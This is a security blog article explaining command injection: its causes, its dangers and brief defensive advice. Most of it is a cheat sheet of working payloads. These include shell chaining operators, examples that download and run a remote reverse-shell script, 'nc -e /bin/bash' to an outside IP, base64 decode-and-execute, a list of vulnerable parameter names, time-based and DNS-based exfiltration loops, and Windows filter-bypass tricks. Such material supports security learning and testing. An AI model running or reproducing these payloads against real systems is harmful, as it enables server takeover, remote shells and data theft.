What is command injection?

11 March 2024 5 minutes Author: Cyber Witcher

The article is dedicated to Command Injection, a type of attack where an attacker can execute arbitrary operating system commands on the server hosting the application. This can lead to complete compromise of the application and all its data. Executing these commands typically allows an attacker to gain unauthorized access or control over the application’s environment and system.

  • Disclaimer: This material is for informational purposes only. The authors are not responsible for any possible misuse of the information. Knowledge of vulnerabilities is essential to improving software security.

What is command injection, how did it come about, and why is it dangerous?

Command Injection is one of the most common and dangerous types of attacks on web applications and servers. In this attack, an attacker has the ability to execute arbitrary operating system commands on the server, which gives him control over the application, its data, and even the entire system.

How did command injection appear?

This type of attack arose along with the development of web technologies, when developers began to integrate system commands to automate tasks on servers. Due to careless processing of user input, vulnerabilities often arise that allow the execution of third-party commands. For example, if an application passes user input directly to the operating system shell without proper validation, an attacker can insert his own command, changing the behavior of the application.

What is dangerous about command injection?

The danger of this type of attack is as follows:

  • Gaining access to the system. An attacker can gain access to system files, databases, or confidential information.

  • Complete control over the server. If the attack is successful, the attacker can install malware, modify data, or even use the server for further attacks.

  • Reduced performance or failure. Executing resource-intensive commands can cause the system to overload or crash.

  • Financial and reputational losses. Compromise of customer data or corporate information can cause significant losses.

It is important to understand that command injection is not dependent on programming language or platform: any system that executes operating system commands is potentially vulnerable. Protection against such attacks consists of implementing secure coding principles, such as validating and sanitizing input, using parameterized queries, and minimizing privileges.

Command injection is a serious threat that can have catastrophic consequences for system security. Understanding its mechanism and implementing timely protection helps to avoid risks.

What is command entry?

Command injection allows an attacker to execute arbitrary operating system commands on the server hosting the application. As a result, the application and all its data can be completely compromised. Executing these commands typically allows an attacker to gain unauthorized access or control over the application environment and host system.

Context

Depending on where your data is being entered, you may need to complete the quoted context (with ” or ‘) before the commands.

Command entry/execution

#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id #  Execute 2º if 1º finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
ls %0A id # %0A Execute both (RECOMMENDED)

#Only unix supported
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls${LS_COLORS:10:1}${IFS}id # Might be useful

#Not executed but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command

Examples

vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay

Parameters

Here are the top 25 parameters that may be vulnerable to code injection and similar RCE vulnerabilities (refer to ):
?cmd={payload}
?exec={payload}
?command={payload}
?execute{payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}

Time-based data theft

Data extraction: character by character

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real    0m5.007s
user    0m0.000s
sys 0m0.000s

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real    0m0.002s
user    0m0.000s
sys 0m0.000s

DNS-based data theft

Based on the tool from https://github.com/HoLyVieR/dnsbin also hosted at dnsbin.zhack.ca
1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'
for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)

Online tools to check for DNS-based data theft

  • dnsbin.zhack.ca

  • pingb.in

Bypass filtering

windows:

powershell C:**2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:**32\c*?c.e?e # calc
Other related articles
CyberwarSocial engineering
Read more
What is dumpster diving?
In this article on dumpster diving in the context of cybersecurity, you'll find a detailed explanation of how this practice involves digging through garbage for valuable information that can be used for malicious activities.
458
Found an error?
If you find an error, take a screenshot and send it to the bot.